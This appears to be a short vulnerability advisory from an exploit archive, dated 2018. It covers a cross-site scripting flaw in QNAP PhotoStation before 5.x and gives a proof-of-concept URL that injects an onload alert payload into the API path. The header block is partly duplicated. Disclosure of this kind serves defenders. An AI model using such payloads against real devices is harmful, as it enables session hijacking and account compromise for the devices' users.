QNAP PhotoStation Cross Site Scripting

# Exploit QNAP PhotoStation < 5.x Cross-Site Scripting
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op= # Exploit QNAP PhotoStation < 5.x Cross-Site Scripting
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op=showone&internalName=PhotoStation&version=5.7.0&down_1_name=TS-251&jump_win=1&qts=4.3.4&seq=120
# Vendor Home Page: https://www.qnap.com
# Tested On: Unix
# Contact: https://www.linkedin.com/in/penetrationtest/


1. Description

Parameter Validation is not implemented correctly in this applicaton, so attackers can implement XSS attack on this webapp.



2. Proof of Concept

https://[Site]:4443/photo/api/inde%3Cbody%20onload=alert('XSSED');%3E.php